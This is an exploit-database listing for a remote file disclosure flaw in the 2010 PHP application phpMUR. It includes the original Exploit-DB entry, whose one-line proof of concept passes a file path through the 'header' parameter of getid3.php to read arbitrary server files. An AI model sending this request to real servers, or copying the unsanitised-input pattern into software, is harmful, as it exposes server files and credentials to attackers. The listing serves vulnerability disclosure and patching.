header-logo
Suggest Exploit
vendor:
phpMUR
by:
Offensive
7,5
CVSS
HIGH
Remote File Disclosure
22
CWE
Product Name: phpMUR
Affected Version From: PHP Version > 4.x.x
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2010

phpMUR Remote File Disclosure

phpMUR is vulnerable to a remote file disclosure vulnerability. This vulnerability allows an attacker to read any file on the server. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'header' parameter in the 'getid3.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This will allow the attacker to read any file on the server.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in the application.
Source

Exploit-DB raw data:

# Exploit Title: phpMUR Remote File Disclosure
# Date: 10/08/2010
# Author: Offensive [Offsensive@live.com] ~ Red-Stone On Inject0r Community !
# Software Link: [ http://sourceforge.net/projects/phpmur ]
# Version : [n/a]
# Tested on: Windows XP

C0nditi0ns : PHP Version > 4.x.x
Exploit Code : http://target/path/getid3/getid3.php?header=[file]

Ramadan Kareem !
Gr33t'z : SA-h4x0r ~ LoOoRd ~ Inj3ct0r M3ms & T3am

Navigation

Suggest Exploit

Services By CQR